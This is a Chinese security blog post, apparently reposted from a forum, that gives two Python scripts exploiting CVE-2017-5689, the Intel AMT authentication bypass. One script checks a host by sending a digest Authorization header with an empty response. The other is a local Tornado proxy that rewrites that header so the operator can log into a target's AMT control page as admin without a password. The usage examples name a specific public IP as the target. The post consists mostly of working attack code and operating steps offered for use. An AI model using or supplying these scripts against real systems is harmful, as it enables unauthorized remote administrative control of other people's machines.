CVE-2017-5689(Intel产品AMT)利用小脚本
首页 > web安全 > 渗透测试    作者:webbaozi   2017年5月11日 23:33 星期四   热度:1813°   百度已收录  
时间:2017-5-11 23:33   热度:1813° 

检测脚本如下,使用方法: python CVE-2017-5689.py http://1.245.154.138:16992/index.htm


#!/usr/bin/python
# -*- coding: utf-8 -*-
#by hackteam.cn
import requests

def exploit(url):
    status = False
    headers = {"User-Agent": "Mozilla/5.0"}
    httprsp = requests.get(url, headers=headers)
    www_authenticate = httprsp.headers.get('WWW-Authenticate')
    www_authenticate = www_authenticate.replace(
        'stale="false"',
        'username="admin",response="",uri="/index.htm",nc="00000001",cnonce="60513ab58858482c"'
    )
    headers.update({"Authorization": www_authenticate})
    httprsp = requests.get(url, headers=headers)
    #print httprsp.status_code
    if not httprsp: return status
    if not httprsp.headers: return status
    if httprsp.status_code == 200: status = True
    return status


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print "[+] Usage: python {} <http:.//192.168.1.100:16992/index.htm>".format(sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    if exploit(url):
        print "[success] CVE-2017-5689 - {}".format(url)
    else:
        print "[failed]  CVE-2017-5689 - {}".format(url)


效果如下:

1.png


利用脚本如下,运行此脚本,浏览器设置代理为你x.x.x.x:8090,访问目标网站,用户名输入admin,密码可以不用输入,然后就可以进到控制界面,http://1.245.154.138:16992/index.htm.


#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by hackteam.cn

import sys
import socket
import os
import tornado.httpclient
import tornado.httpserver
import tornado.ioloop
import tornado.web
import re
from urlparse import urlparse

def get_proxy(url):
    url_parsed = urlparse(url, scheme='http')
    proxy_key = '%s_proxy' % url_parsed.scheme
    return os.environ.get(proxy_key)

def parse_proxy(proxy):
    proxy_parsed = urlparse(proxy, scheme='http')
    return proxy_parsed.hostname, proxy_parsed.port

def fetch_request(url, callback, **kwargs):
    proxy = get_proxy(url)
    if proxy:
        tornado.httpclient.AsyncHTTPClient.configure(
            'tornado.curl_httpclient.CurlAsyncHTTPClient')
        host, port = parse_proxy(proxy)
        kwargs['proxy_host'] = host
        kwargs['proxy_port'] = port
    req = tornado.httpclient.HTTPRequest(url, **kwargs)
    client = tornado.httpclient.AsyncHTTPClient()
    client.fetch(req, callback, raise_error=False)

class ProxyHandler(tornado.web.RequestHandler):
    SUPPORTED_METHODS = ("GET", "HEAD", "POST", "DELETE", "PATCH", "PUT",
                         "OPTIONS", "CONNECT")
    @tornado.web.asynchronous
    def get(self):
        def handle_response(response):
            if (response.error and not
                    isinstance(response.error, tornado.httpclient.HTTPError)):
                self.set_status(500)
                self.write('Internal server error:\n' + str(response.error))
            else:
                self.set_status(response.code, response.reason)
                self._headers = tornado.httputil.HTTPHeaders() # clear tornado default header
                for header, v in response.headers.get_all():
                    if header not in ('Content-Length', 'Transfer-Encoding', 'Content-Encoding', 'Connection'):
                        self.add_header(header, v) # some header appear multiple times, eg 'Set-Cookie'

                if response.body:
                    self.set_header('Content-Length', len(response.body))
                    self.write(response.body)
            self.finish()

        body = self.request.body
        if not body:
            body = None
        try:
            myheader= self.request.headers
            if "Authorization" in myheader:
                username_pattern=re.compile(r'username=".*?"')
                response_pattern=re.compile(r'response="[0-9a-f]+?"')
                out = re.sub(username_pattern, 'username="admin"', myheader["Authorization"])
                out = re.sub(response_pattern, 'response=""', myheader["Authorization"])
                myheader["Authorization"]=out

            if 'Proxy-Connection' in self.request.headers:
                del self.request.headers['Proxy-Connection']
            fetch_request(
                self.request.uri,
                handle_response,
                method=self.request.method,
                body=body,
                headers=myheader,
                request_timeout=5,
                follow_redirects=False,
                allow_nonstandard_methods=True)
        except tornado.httpclient.HTTPError as httperror:
            if hasattr(httperror, 'response') and httperror.response:
                self.on_response(httperror.response)
            else:
                self.set_status(500)
                self.write('Internal server error:\n' + str(httperror))
                self.finish()

    @tornado.web.asynchronous
    def post(self):
        self.get()

    @tornado.web.asynchronous
    def connect(self):
        host, port = self.request.uri.split(':')
        client = self.request.connection.stream

        def read_from_client(data):
            upstream.write(data)

        def read_from_upstream(data):
            client.write(data)

        def client_close(data=None):
            if upstream.closed():
                return
            if data:
                upstream.write(data)
            upstream.close()

        def upstream_close(data=None):
            if client.closed():
                return
            if data:
                client.write(data)
            client.close()

        def start_tunnel():
            client.read_until_close(client_close, read_from_client)
            upstream.read_until_close(upstream_close, read_from_upstream)
            client.write(b'HTTP/1.0 200 Connection established\r\n\r\n')

        def on_proxy_response(data=None):
            if data:
                first_line = data.splitlines()[0]
                http_v, status, text = first_line.split(None, 2)
                if int(status) == 200:
                    start_tunnel()
                    return
            self.set_status(500)
            self.finish()

        def start_proxy_tunnel():
            upstream.write('CONNECT %s HTTP/1.1\r\n' % self.request.uri)
            upstream.write('Host: %s\r\n' % self.request.uri)
            upstream.write('Proxy-Connection: Keep-Alive\r\n\r\n')
            upstream.read_until('\r\n\r\n', on_proxy_response)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        upstream = tornado.iostream.IOStream(s)

        proxy = get_proxy(self.request.uri)
        if proxy:
            proxy_host, proxy_port = parse_proxy(proxy)
            upstream.connect((proxy_host, proxy_port), start_proxy_tunnel)
        else:
            upstream.connect((host, int(port)), start_tunnel)

if __name__ == '__main__':
    port = 8090
    print "Starting Proxy on port 8090!"
    handlers = [(r'.*', ProxyHandler),]
    app = tornado.web.Application(handlers=handlers)
    app.listen(port)
    tornado.ioloop.IOLoop.instance().start()


效果如下:

2.png

注意:利用脚本需要tornado模块,下载此模块tornado-4.5.1.tar.gz

然后本地设置代理127.0.0.1:8090然后访问目标即可

转自:https://www.t00ls.net/thread-39820-1-1.html

二维码加载中...
本文作者:webbaozi      文章标题: CVE-2017-5689(Intel产品AMT)利用小脚本
本文地址:http://www.webbaozi.com/stcs/65.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1